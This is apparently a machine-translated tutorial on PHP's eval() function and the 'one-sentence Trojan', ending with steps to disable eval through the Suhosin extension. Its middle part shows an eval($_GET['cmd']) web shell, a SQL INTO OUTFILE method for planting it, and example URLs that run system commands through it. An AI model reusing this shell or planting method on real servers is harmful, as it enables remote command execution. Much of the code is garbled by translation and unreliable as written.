Introduction to eval functions and Analysis of PHP one-sentence Trojan

Eval function introduction and PHP one-sentence Trojan analysis Hello everyone, I am Carol, and my QQ is: 906871417 I: eval function 1. eval () function calculates the string according to PHP code. 2. the string must be a valid PHP code and must end with a semicolon. 3. If the return statement is not called in the code string, NULL is returned. If

Eval function introduction and PHP one-sentence Trojan analysis Hello everyone, I am Carol, and my QQ is: 906871417 I: eval function 1. eval () function calculates the string according to PHP code. 2. the string must be a valid PHP code and must end with a semicolon. 3. If the return statement is not called in the code string, NULL is returned. If

Introduction to eval functions and Analysis of PHP one-sentence Trojan

Hello everyone, I am Carol, and my QQ is: 906871417

I. eval Functions

1. the eval () function calculates the string according to the PHP code.

2. the string must be a valid PHP code and must end with a semicolon.

3. If the return statement is not called in the code string, NULL is returned. If a parsing error exists in the Code, the eval () function returns false.

II. General Usage of eval Functions

$ String = "beautiful ";

$ Time = "winter ";

$ Str = 'this is a $ string $ time morning! ';

Echo $ str ."
";

Eval ("\ $ str = \" $ str \";");

Echo $ str;

?>

Output

This is a $ string $ time morning!

This is a beautiful winter morning!

Iii. Special usage of eval Functions

Eval ($ _ GET ["cmd"]);

Iv. Principles of a php sentence Trojan

1. Write horse through database:

Select" "Into outfile" D :\\ phpStudy \ WWW \ bb. php ", but this command can be executed like this when DB and web are on the same machine.

2. Write horse through web

Eval ($ _ GET ["cmd"]);

?>

Access:

Http: // localhost/aa. php? Cmd = fwrite (fopen ("aa.txt", "w"), "hello, world! ");

View the php shell information:

Http: // localhost/aa. php? Cmd = phpinfo ();

View the currently running service

Http: // localhost/aa. php? Cmd = system ("net start ");

5. Disable the eval function

Whether it is a linux server or a windows server, the eval command is very dangerous.

How to disable the eval command

Setting disable_functions = eval in php. ini cannot disable eval. According to the instructions in the php manual, eval is a language constructor rather than a function. If you want to disable eval, a third-party extension is required to use Suhosin.

Linux installation:

Php installation will not be written.

Suhosin Installation

Wget http://download.suhosin.org/suhosin-0.9.23.tgz

Tar zxvfsuhosin-0.9.23.tgz

Cd suhosin-0.9.23

/Usr/local/php/bin/phpize // This step cannot be saved

./Configure -- with-php-config =/usr/local/php/bin/php-config // the absolute path of php-config must be specified here.

Make

Make install

Installing shared extensions:/usr/local/php/lib/php/extensions/no-debug-non-zts-20060613/

Add the following statement in php. ini.

Extension = suhosin. so

Suhosin.exe cutor. disable_eval = on

Reference: http://ju.outofmemory.cn/entry/29300